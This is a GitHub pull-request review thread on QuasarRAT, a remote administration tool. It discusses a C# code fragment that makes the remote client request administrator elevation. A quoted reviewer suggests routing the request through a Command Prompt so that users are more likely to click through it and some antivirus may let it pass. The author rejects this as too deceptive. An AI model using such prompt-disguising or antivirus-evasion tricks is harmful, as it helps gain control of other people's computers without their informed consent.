Client/Core/Commands/SystemHandler.cs

```diff
@@ -438,6 +439,35 @@ public static void HandleDoProcessKill(Packets.ServerPackets.DoProcessKill comma
             }
         }
 
+        public static void HandleAskElevate(Packets.ServerPackets.DoAskElevate command, Client client)
+        {
+            if (!(WindowsAccountHelper.GetAccountType() == "Admin"))
+            {
+                ProcessStartInfo proc = new ProcessStartInfo();
+                proc.UseShellExecute = true;
+                proc.WorkingDirectory = Environment.CurrentDirectory;
+                proc.FileName = Application.ExecutablePath;
```

Comment:
Ah, I think I understand what you mean. You're saying that if the end user
sees the elevation request from a Command Prompt that they'll be more
likely to allow it. I agree, it's subtle and would likely work well. Most
people would simple click through it without thinking.

I believe this project is trying to distance itself from the stigma
associated with malicious or shady intents -- my method is very obvious and
blatant as to what is requesting the elevation.

I will be communicating either by phone or email with the person who will
see the prompt, so I can tell them to allow it. (I plan to use this on many
computers that I manage in an Active Directory setting)

On Fri, Mar 18, 2016 at 3:37 PM, DragonzMaster <notifications@github.com>
wrote:

> In Client/Core/Commands/SystemHandler.cs
> <https://github.com/quasar/QuasarRAT/pull/430#discussion_r56710952>:
>
> > @@ -438,6 +439,35 @@ public static void HandleDoProcessKill(Packets.ServerPackets.DoProcessKill comma
> >              }
> >          }
> >
> > +        public static void HandleAskElevate(Packets.ServerPackets.DoAskElevate command, Client client)
> > +        {
> > +            if (!(WindowsAccountHelper.GetAccountType() == "Admin"))
> > +            {
> > +                ProcessStartInfo proc = new ProcessStartInfo();
> > +                proc.UseShellExecute = true;
> > +                proc.WorkingDirectory = Environment.CurrentDirectory;
> > +                proc.FileName = Application.ExecutablePath;
>
> The example is just from client's shell but you can change it to true
> The point that when using cmd the client will accept the elevation of
> system process, I think it may be good with some antiviruses and the client
> would trust and elevate it.
> [sorry for my English as it is not my first language]
>
> —
> You are receiving this because you authored the thread.
> Reply to this email directly or view it on GitHub
> <https://github.com/quasar/QuasarRAT/pull/430/files/9b0e1d8a230e0d5fdd9b150d59f91e82d197e085#r56710952>
>